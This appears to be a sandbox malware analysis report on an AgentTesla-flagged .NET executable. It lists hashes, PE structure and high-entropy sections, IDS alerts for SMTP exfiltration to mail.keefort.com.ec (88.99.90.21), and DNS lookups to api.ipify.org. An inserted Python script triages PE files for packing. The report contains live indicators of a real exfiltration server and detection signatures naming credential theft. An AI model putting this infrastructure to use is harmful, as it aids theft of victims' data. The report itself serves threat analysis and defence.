                                                                                                                                    SSDEEP:12288:DpkOPAdcXnyXx6q171UTaZL3vIuGBxh+A1FmJEbJHP2OJ7eEahRZ5G:5Ad1NhZL3iBxh+A1Fmibhz7hS5G
                                                                                                                                    MD5:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    SHA1:E0DC6B437E0597DA471E18D2EE55D412A7E5CF1A
                                                                                                                                    SHA-256:BFD2500B6963725AA9252FED8EB549A976CA73C9317746C40E5EB406641EAE17
                                                                                                                                    SHA-512:230A28F20FADACE78E97AD467EE53B80A679F6133440FE3BADF9A016311284B369F61256A4ED0ABFB478D1F387E03E70679AC3AB8A3D651084D2998D04C659BA
                                                                                                                                    Malicious:true
                                                                                                                                    Process:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Entropy (8bit):7.972515156065869
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                    File name:TTRef06022301.exe
                                                                                                                                    File size:791552
                                                                                                                                    MD5:5478729e3225d4f158f811d03a8d4945
                                                                                                                                    SHA1:e0dc6b437e0597da471e18d2ee55d412a7e5cf1a
                                                                                                                                    SHA256:bfd2500b6963725aa9252fed8eb549a976ca73c9317746c40e5eb406641eae17
                                                                                                                                    SHA512:230a28f20fadace78e97ad467ee53b80a679f6133440fe3badf9a016311284b369f61256a4ed0abfb478d1f387e03e70679ac3ab8a3d651084d2998d04c659ba
                                                                                                                                    SSDEEP:12288:DpkOPAdcXnyXx6q171UTaZL3vIuGBxh+A1FmJEbJHP2OJ7eEahRZ5G:5Ad1NhZL3iBxh+A1Fmibhz7hS5G
                                                                                                                                    TLSH:B7F42310725AD638C8BEF6B2ABFDB8D0537CA3222956D96C8CB810DFDD61759C1B0613
                                                                                                                                    Icon Hash:8200828182820000
                                                                                                                                    Entrypoint:0x4c215e
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x63E110F2 [Mon Feb 6 14:38:42 2023 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                    Instruction
                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc210a | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0xd38 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc0204 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc0164 | 0xc0200 | False | 0.9621917188516591 | data | 7.977721750892678 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc4000 | 0xd38 | 0xe00 | False | 0.7416294642857143 | data | 6.305469622480461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xc40c8 | 0x8ff | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0xc49d8 | 0x14 | data | |
RT_VERSION | 0xc49fc | 0x338 | data | |
DLL | Import
mscoree.dll | _CorExeMain
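The static profile above is the classic packed .NET loader: a single .text section at entropy 7.98 (the maximum is 8.0) that also holds the CLR header (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR at 0x2008), and mscoree.dll!_CorExeMain as the only native import. The following script is an added example, not part of the Joe Sandbox report or its tooling: it parses the PE section table with the standard library only, computes per-section Shannon entropy, and reads the COM descriptor directory to tell a managed binary from a native one. The 7.5 entropy threshold, the function names and the minimal test PE it builds for itself are assumptions of the example, not values taken from the report.

```python
"""Stdlib-only PE triage: section entropy plus CLR-header check (added example)."""
import math
import struct

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
PACKED_ENTROPY = 7.5  # assumption: a code section above this is almost certainly compressed/encrypted


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte, 0.0 for constant data up to 8.0 for a uniform byte distribution."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(data: bytes):
    """Return (has_clr_header, [(name, va, vsize, raw_size, raw_ptr, characteristics)])."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE: missing MZ")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE: missing PE signature")
    num_sections, = struct.unpack_from("<H", data, e_lfanew + 6)
    size_opt, = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24
    magic, = struct.unpack_from("<H", data, opt)
    # data directories start 96 bytes into a PE32 optional header, 112 into PE32+
    dirs = opt + (96 if magic == 0x10B else 112)
    num_dirs, = struct.unpack_from("<I", data, dirs - 4)
    com_va = 0
    if num_dirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
        com_va, _ = struct.unpack_from("<II", data, dirs + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
    sections = []
    hdr = opt + size_opt  # section table follows the optional header
    for i in range(num_sections):
        off = hdr + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        chars, = struct.unpack_from("<I", data, off + 36)
        sections.append((name, va, vsize, raw_size, raw_ptr, chars))
    return com_va != 0, sections


def triage(data: bytes) -> dict:
    """Flag a managed binary whose executable section looks packed."""
    is_dotnet, sections = parse_sections(data)
    rows, packed = [], False
    for name, va, _vsize, raw_size, raw_ptr, chars in sections:
        ent = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])
        executable = bool(chars & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE))
        packed = packed or (executable and ent > PACKED_ENTROPY)
        rows.append({"name": name, "va": va, "entropy": round(ent, 3), "executable": executable})
    return {"dotnet": is_dotnet, "packed_code": packed, "sections": rows}


def build_sample_pe(text_payload: bytes, reloc_payload: bytes) -> bytes:
    """Constructed test input (not the report's sample): a minimal PE32 with a CLR
    directory entry and two sections laid out like the report's .text/.reloc."""
    file_align, headers_size = 0x200, 0x200
    sections = [
        (b".text", 0x2000, text_payload, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | 0x40000000),
        (b".reloc", 0x6000, reloc_payload, 0x40000040 | 0x02000000),
    ]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
                      0x10B, 48, 0, len(text_payload), 0, 0, 0x2000, 0x2000, 0x6000,
                      0x400000, 0x1000, file_align, 4, 0, 0, 0, 4, 0, 0, 0x8000, headers_size,
                      0, 2, 0x8540, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] = (0x2008, 0x48)  # CLR header inside .text, as in the report
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    sec_hdrs, body, raw_ptr = b"", b"", headers_size
    for name, va, payload, chars in sections:
        raw_size = (len(payload) + file_align - 1) // file_align * file_align
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, len(payload), va, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += payload.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    head = (dos + b"PE\0\0" + file_hdr + opt + sec_hdrs).ljust(headers_size, b"\0")
    return head + body


if __name__ == "__main__":
    # a uniform byte distribution gives entropy exactly 8.0, mimicking the report's 7.98 .text
    print(triage(build_sample_pe(bytes(range(256)) * 4, b"\0" * 12)))
```

Entropy alone is not proof of packing (a large embedded PNG or certificate store also scores high), which is why the check is restricted to executable sections and paired with the CLR-header test: a managed PE whose only code section is near 8.0 has no plaintext IL in it, so the real program is being decrypted at run time, exactly what the report's unpacker and injection signatures go on to observe.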
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/09/23-19:40:35.012308 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49716 | 587 | 192.168.2.7 | 88.99.90.21
02/09/23-19:40:59.212357 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 9, 2023 19:40:24.616727114 CET | 49715 | 443 | 192.168.2.7 | 104.237.62.211
Feb 9, 2023 19:40:24.616786957 CET | 443 | 49715 | 104.237.62.211 | 192.168.2.7
Feb 9, 2023 19:40:24.616872072 CET | 49715 | 443 | 192.168.2.7 | 104.237.62.211
Feb 9, 2023 19:40:24.685894012 CET | 49715 | 443 | 192.168.2.7 | 104.237.62.211
Feb 9, 2023 19:40:24.685928106 CET | 443 | 49715 | 104.237.62.211 | 192.168.2.7
Feb 9, 2023 19:40:25.196743965 CET | 443 | 49715 | 104.237.62.211 | 192.168.2.7
Feb 9, 2023 19:40:25.196902990 CET | 49715 | 443 | 192.168.2.7 | 104.237.62.211
Feb 9, 2023 19:40:25.200385094 CET | 49715 | 443 | 192.168.2.7 | 104.237.62.211
Feb 9, 2023 19:40:25.200401068 CET | 443 | 49715 | 104.237.62.211 | 192.168.2.7
Feb 9, 2023 19:40:25.200865984 CET | 443 | 49715 | 104.237.62.211 | 192.168.2.7
Feb 9, 2023 19:40:25.314053059 CET | 49715 | 443 | 192.168.2.7 | 104.237.62.211
Feb 9, 2023 19:40:25.683526993 CET | 49715 | 443 | 192.168.2.7 | 104.237.62.211
Feb 9, 2023 19:40:25.683562040 CET | 443 | 49715 | 104.237.62.211 | 192.168.2.7
Feb 9, 2023 19:40:25.847439051 CET | 443 | 49715 | 104.237.62.211 | 192.168.2.7
Feb 9, 2023 19:40:25.847583055 CET | 443 | 49715 | 104.237.62.211 | 192.168.2.7
Feb 9, 2023 19:40:25.847681999 CET | 49715 | 443 | 192.168.2.7 | 104.237.62.211
Feb 9, 2023 19:40:25.853321075 CET | 49715 | 443 | 192.168.2.7 | 104.237.62.211
Feb 9, 2023 19:40:34.638922930 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:34.662579060 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:34.662755013 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:34.706062078 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:34.706923962 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:34.732095003 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:34.733659029 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:34.757739067 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:34.758281946 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:34.822628021 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:34.912858963 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:34.913141966 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:34.936597109 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:34.939181089 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:34.939482927 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:34.973017931 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:34.973248959 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:34.996680975 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:34.996709108 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:35.012307882 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:35.012401104 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:35.013139009 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:35.013189077 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:35.035732031 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:35.036379099 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:35.045454025 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:35.096127987 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:46.528764009 CET | 49718 | 443 | 192.168.2.7 | 173.231.16.76
Feb 9, 2023 19:40:46.528839111 CET | 443 | 49718 | 173.231.16.76 | 192.168.2.7
Feb 9, 2023 19:40:46.528918982 CET | 49718 | 443 | 192.168.2.7 | 173.231.16.76
Feb 9, 2023 19:40:46.548599005 CET | 49718 | 443 | 192.168.2.7 | 173.231.16.76
Feb 9, 2023 19:40:46.548645973 CET | 443 | 49718 | 173.231.16.76 | 192.168.2.7
Feb 9, 2023 19:40:48.040225029 CET | 443 | 49718 | 173.231.16.76 | 192.168.2.7
Feb 9, 2023 19:40:48.040364027 CET | 49718 | 443 | 192.168.2.7 | 173.231.16.76
Feb 9, 2023 19:40:48.050077915 CET | 49718 | 443 | 192.168.2.7 | 173.231.16.76
Feb 9, 2023 19:40:48.050120115 CET | 443 | 49718 | 173.231.16.76 | 192.168.2.7
Feb 9, 2023 19:40:48.050640106 CET | 443 | 49718 | 173.231.16.76 | 192.168.2.7
Feb 9, 2023 19:40:48.128472090 CET | 49718 | 443 | 192.168.2.7 | 173.231.16.76
Feb 9, 2023 19:40:49.000050068 CET | 49718 | 443 | 192.168.2.7 | 173.231.16.76
Feb 9, 2023 19:40:49.000092983 CET | 443 | 49718 | 173.231.16.76 | 192.168.2.7
Feb 9, 2023 19:40:49.156790972 CET | 443 | 49718 | 173.231.16.76 | 192.168.2.7
Feb 9, 2023 19:40:49.156883001 CET | 443 | 49718 | 173.231.16.76 | 192.168.2.7
Feb 9, 2023 19:40:49.156956911 CET | 49718 | 443 | 192.168.2.7 | 173.231.16.76
Feb 9, 2023 19:40:49.158757925 CET | 49718 | 443 | 192.168.2.7 | 173.231.16.76
Feb 9, 2023 19:40:58.939591885 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:58.963145971 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:58.963294983 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.003160000 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.009274960 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.034955025 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.035612106 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.059699059 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.060187101 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.099977970 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.106488943 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.130882978 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.132616997 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.173305988 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.181783915 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.205737114 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.205801964 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.212357044 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.212438107 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.212482929 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.212526083 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
Feb 9, 2023 19:40:59.235944033 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.238378048 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.245584965 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7
Feb 9, 2023 19:40:59.426331997 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Feb 9, 2023 19:40:24.502187014 CET6117853192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:24.524148941 CET53611788.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:24.555389881 CET6392653192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:24.576765060 CET53639268.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.327800035 CET5333653192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:34.389697075 CET53533368.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.394052029 CET5100753192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:34.564606905 CET53510078.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:46.467117071 CET6076553192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:46.489089966 CET53607658.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:46.497050047 CET5828353192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:46.514812946 CET53582838.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:58.832264900 CET6267953192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:58.851946115 CET53626798.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:58.871776104 CET6139253192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:58.938018084 CET53613928.8.8.8192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 9, 2023 19:40:24.502187014 CET | 192.168.2.7 | 8.8.8.8 | 0xdfe7 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:24.555389881 CET | 192.168.2.7 | 8.8.8.8 | 0x3aea | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:34.327800035 CET | 192.168.2.7 | 8.8.8.8 | 0xf42f | Standard query (0) | mail.keefort.com.ec | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:34.394052029 CET | 192.168.2.7 | 8.8.8.8 | 0x17dc | Standard query (0) | mail.keefort.com.ec | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:46.467117071 CET | 192.168.2.7 | 8.8.8.8 | 0x8431 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:46.497050047 CET | 192.168.2.7 | 8.8.8.8 | 0x82f3 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:58.832264900 CET | 192.168.2.7 | 8.8.8.8 | 0xd65b | Standard query (0) | mail.keefort.com.ec | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:58.871776104 CET | 192.168.2.7 | 8.8.8.8 | 0xf7d6 | Standard query (0) | mail.keefort.com.ec | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 9, 2023 19:40:24.524148941 CET | 8.8.8.8 | 192.168.2.7 | 0xdfe7 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Feb 9, 2023 19:40:24.524148941 CET | 8.8.8.8 | 192.168.2.7 | 0xdfe7 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:24.524148941 CET | 8.8.8.8 | 192.168.2.7 | 0xdfe7 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:24.524148941 CET | 8.8.8.8 | 192.168.2.7 | 0xdfe7 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:24.576765060 CET | 8.8.8.8 | 192.168.2.7 | 0x3aea | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Feb 9, 2023 19:40:24.576765060 CET | 8.8.8.8 | 192.168.2.7 | 0x3aea | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:24.576765060 CET | 8.8.8.8 | 192.168.2.7 | 0x3aea | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:24.576765060 CET | 8.8.8.8 | 192.168.2.7 | 0x3aea | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:34.389697075 CET | 8.8.8.8 | 192.168.2.7 | 0xf42f | No error (0) | mail.keefort.com.ec | keefort.com.ec | | CNAME (Canonical name) | IN (0x0001) | false
Feb 9, 2023 19:40:34.389697075 CET | 8.8.8.8 | 192.168.2.7 | 0xf42f | No error (0) | keefort.com.ec | | 88.99.90.21 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:34.564606905 CET | 8.8.8.8 | 192.168.2.7 | 0x17dc | No error (0) | mail.keefort.com.ec | keefort.com.ec | | CNAME (Canonical name) | IN (0x0001) | false
Feb 9, 2023 19:40:34.564606905 CET | 8.8.8.8 | 192.168.2.7 | 0x17dc | No error (0) | keefort.com.ec | | 88.99.90.21 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:46.489089966 CET | 8.8.8.8 | 192.168.2.7 | 0x8431 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Feb 9, 2023 19:40:46.489089966 CET | 8.8.8.8 | 192.168.2.7 | 0x8431 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:46.489089966 CET | 8.8.8.8 | 192.168.2.7 | 0x8431 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:46.489089966 CET | 8.8.8.8 | 192.168.2.7 | 0x8431 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:46.514812946 CET | 8.8.8.8 | 192.168.2.7 | 0x82f3 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Feb 9, 2023 19:40:46.514812946 CET | 8.8.8.8 | 192.168.2.7 | 0x82f3 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:46.514812946 CET | 8.8.8.8 | 192.168.2.7 | 0x82f3 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:46.514812946 CET | 8.8.8.8 | 192.168.2.7 | 0x82f3 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
